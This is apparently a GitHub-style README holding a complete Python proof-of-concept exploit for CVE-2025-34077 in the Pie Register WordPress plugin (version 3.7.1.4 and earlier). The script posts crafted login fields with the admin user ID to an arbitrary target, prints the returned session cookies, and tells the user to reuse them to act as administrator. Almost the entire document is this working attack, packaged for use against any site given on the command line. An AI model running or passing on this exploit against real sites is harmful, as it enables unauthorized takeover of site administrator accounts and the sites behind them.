README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
BANNER = r"""
_______ ________ ___ ___ ___ _____ ____ _ _ ___ ______ ______
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |___ \| || | / _ \____ |____ |
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ __) | || |_| | | | / / / /
| | \ \/ / | __| |______| / /| | | |/ /|___ \ |______| |__ <|__ _| | | | / / / /
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | | | | |_| |/ / / /
\_____| \/ |______| |____|\___/____|____/ |____/ |_| \___//_/ /_/
by Mrj Haxcore | CVE-2025-34077
"""
HELP = """
Usage:
python3 pie.py <http://target.site>
Description:
This script exploits an unauthenticated admin session hijack vulnerability
in the Pie Register WordPress plugin <= 3.7.1.4 to steal admin cookies.
Options:
-h, --help Show this help message and exit
"""
def main():
print(BANNER)
if len(sys.argv) < 2 or sys.argv[1] in ['-h', '--help']:
print(HELP)
sys.exit(0)
target = sys.argv[1].rstrip('/')
login_url = f"{target}/"
headers = {
"User-Agent": "Mozilla/5.0 (PoC Exploit for CVE-2025-34077)"
}
data = {
"user_id_social_site": "1", # Admin ID
"social_site": "true",
"piereg_login_after_registration": "true",
"_wp_http_referer": "/login/",
"log": "null",
"pwd": "null"
}
print("[*] Sending payload to hijack admin session...")
try:
resp = requests.post(login_url, data=data, headers=headers, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
sys.exit(1)
cookies = resp.cookies.get_dict()
if cookies:
print("\n[+] Successfully hijacked cookies for user_id=1 (admin):")
for k, v in cookies.items():
print(f" {k} = {v}")
print("\n[!] Use these cookies in your browser or tools like curl or Burp to act as admin.")
else:
print("[-] Failed to get any cookies. Target may be patched or not vulnerable.")
print(f"[i] HTTP Status: {resp.status_code}")
print(f"[i] Response Headers: {resp.headers}")
if __name__ == "__main__":
main()